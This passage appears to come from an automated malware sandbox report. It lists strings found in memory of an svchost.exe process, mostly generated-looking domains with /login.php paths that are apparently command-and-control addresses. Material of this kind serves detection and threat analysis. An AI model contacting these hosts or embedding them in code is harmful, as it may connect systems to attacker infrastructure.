    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvew.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyziw.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galycah.com/login.php
    Source: svchost.exe, 00000001.00000003.2828653969.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2829200303.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydyw.com/http://puzybil.com/
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2610233166.0000000005F53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfyb.com/login.php
    Source: svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galykiz.com/H
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galykiz.com/login.php(
    Source: svchost.exe, 00000001.00000003.2855136666.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855135066.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855945770.000000000BEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynus.com/http://lysysir.com/http://vowyrec.com/
    Source: svchost.exe, 00000001.00000003.2855136666.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855135066.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855945770.000000000BEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynus.com/http://vowyrec.com/http://lysysir.com/http://galynus.com/H
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574096603.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573059018.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypob.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyros.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867200326.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2973793571.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2659316703.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvaw.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.00000000073A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfes.com/login.php
    Source: svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfes.com/login.phpZ
    Source: svchost.exe, 00000001.00000003.2574659514.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980429239.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582651634.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfuz.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867200326.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhus.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganykaz.com/
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589901555.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589536552.000000000BE25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypis.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613424581.000000000734D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613994929.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979545984.000000000721C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqib.com/login.php
    Source: svchost.exe, 00000001.00000003.2841115094.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjar.com/
    Source: svchost.exe, 00000001.00000003.2591407589.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2584954171.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587032429.00000000072A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjar.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjux.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545527847.00000000072A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymyr.com/login.php
    Source: svchost.exe, 00000001.00000003.2536042650.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2533385713.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532105233.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545206078.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535694034.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyd.com/login.php
    Source: svchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557869409.0000000007262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytej.com/login.php(
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyxoj.com/login.php
    Source: svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803526533.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800699213.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfoj.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.00000000073A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793548404.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygyx.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygyx.com/login.php29
    Source: svchost.exe, 00000001.00000003.2828653969.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2829200303.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/
    Source: svchost.exe, 00000001.00000003.2828653969.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2834251142.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835191372.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2829200303.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/H
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyner.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811129520.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysud.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytuj.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyved.com/login.php
